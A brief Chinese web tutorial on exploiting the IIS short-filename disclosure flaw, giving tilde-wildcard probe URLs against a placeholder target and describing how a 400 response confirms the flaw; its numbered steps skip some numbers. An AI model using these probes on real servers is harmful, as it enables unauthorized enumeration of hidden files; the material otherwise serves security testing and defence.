IIS网站短文件名泄露漏洞的利用方法
1、构造payload查看是否具有漏洞1. http://www.target.com/*~1****/a.aspx2. http://www.target.com/l1j1e*~1****/a.aspx
3、进一步确认,如果输入不存在的字母出现400 bad request 确认可以利用
5、这个漏洞只能猜解6个字母,还是有一定局限性的,希望对你有帮助
声明:本网站引用、摘录或转载内容仅供网站访问者交流或参考,不代表本站立场,如存在版权或非法内容,请联系站长删除,联系邮箱:site.kefu@qq.com。
阅读量:75
阅读量:32
阅读量:68
阅读量:75
阅读量:82